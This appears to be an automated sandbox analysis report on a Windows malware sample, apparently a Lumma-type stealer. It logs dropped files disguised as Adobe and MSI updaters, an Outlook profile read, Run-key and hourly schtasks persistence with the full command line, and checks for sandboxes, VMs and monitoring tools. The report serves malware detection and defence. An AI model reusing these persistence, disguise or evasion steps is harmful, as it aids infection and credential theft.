                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 2q45IEa3Ee.exeStatic file information: File size 2551616 > 1048576
                  Source: 2q45IEa3Ee.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x15fc00
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdbT2n2 `2_CorExeMainmscoree.dll source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdbP@n@ `@_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: E:\HD_Audio\VS2005\Resetup\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb source: 2q45IEa3Ee.exe
                  Source: Binary string: D:\TestProject\SetupAfterRebootService\SetupAfterRebootService\obj\Release\SetupAfterRebootService.pdb,ANA @A_CorExeMainmscoree.dll source: 2q45IEa3Ee.exe
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\ka7c6p6\obj\Release\Question.pdb source: MSIUpdaterV202.exe.0.dr, AdobeUpdaterV202.exe.0.dr, oRkIPIEeryat7GMgjkBr.exe.0.dr, lumma1504[1].exe.0.dr
                  Source: lumma1504[1].exe.0.drStatic PE information: 0x8AD735A1 [Sun Oct 25 04:22:57 2043 UTC]
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D3B380 LoadLibraryA,GetProcAddress,0_2_00D3B380
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name:
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .themida
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .boot
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push 58490A72h; mov dword ptr [esp], edx0_2_011C1C56
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push edi; mov dword ptr [esp], 000AA9A0h0_2_011C1CCA
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push 7B7C085Ch; mov dword ptr [esp], ebx0_2_011C1CE6
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push ebx; mov dword ptr [esp], edx0_2_011C1CF9
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDD0F9 push edx; mov dword ptr [esp], 55DBEDB5h0_2_011C1D7E
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push edi; mov dword ptr [esp], 37DA81A0h0_2_011CF3CF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ebp; mov dword ptr [esp], esi0_2_011CF3FF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ebx; mov dword ptr [esp], edx0_2_011CF43D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push eax; mov dword ptr [esp], esi0_2_011CF4B2
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDF0E1 push ecx; mov dword ptr [esp], esi0_2_011CF519
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push 485CE8D9h; mov dword ptr [esp], ecx0_2_011D3C1E
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push 72D11309h; mov dword ptr [esp], esi0_2_011D3C3B
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push edx; mov dword ptr [esp], ebx0_2_011D3C51
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push edi; mov dword ptr [esp], 6664B914h0_2_011D3C7D
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC8DC push ebp; mov dword ptr [esp], edx0_2_011D3D1C
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push edx; mov dword ptr [esp], ebp0_2_011D3210
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push ebx; mov dword ptr [esp], ebp0_2_011D3254
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDC0D0 push 5A0126E9h; mov dword ptr [esp], edi0_2_011D328C
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push edi; mov dword ptr [esp], ecx0_2_011C41C7
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push edi; mov dword ptr [esp], ecx0_2_011C4216
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push esi; mov dword ptr [esp], 3BD107AEh0_2_011C428F
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push eax; mov dword ptr [esp], ebx0_2_011C42B7
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push eax; mov dword ptr [esp], 4AAA72D6h0_2_011C42BB
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE0867 push ecx; mov dword ptr [esp], ebx0_2_011C42EF
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push edx; mov dword ptr [esp], edi0_2_011D5191
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push 5B1B3B8Ah; mov dword ptr [esp], ecx0_2_011D5199
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push ebp; mov dword ptr [esp], ecx0_2_011D51AA
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push edx; mov dword ptr [esp], 000AABB0h0_2_011D51E8
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push eax; mov dword ptr [esp], ecx0_2_011D5265
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FDE85D push ebp; mov dword ptr [esp], ecx0_2_011D5269
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00FE39FC push ebx; mov dword ptr [esp], edx0_2_011CA92F
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: entropy: 7.999554529460661
                  Source: 2q45IEa3Ee.exeStatic PE information: section name: .boot entropy: 7.949677127496007
                  Source: lumma1504[1].exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: oRkIPIEeryat7GMgjkBr.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: AdobeUpdaterV202.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: MSIUpdaterV202.exe.0.drStatic PE information: section name: .text entropy: 7.996781792059311
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile created: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0cJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0cJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Found stalling execution ending in API Sleep call
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeStalling execution: Execution stalls by calling Sleepgraph_0-17837
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSpecial instruction interceptor: First address: F70B95 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: C60000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2A20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2C60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 1590000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 3350000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 1830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
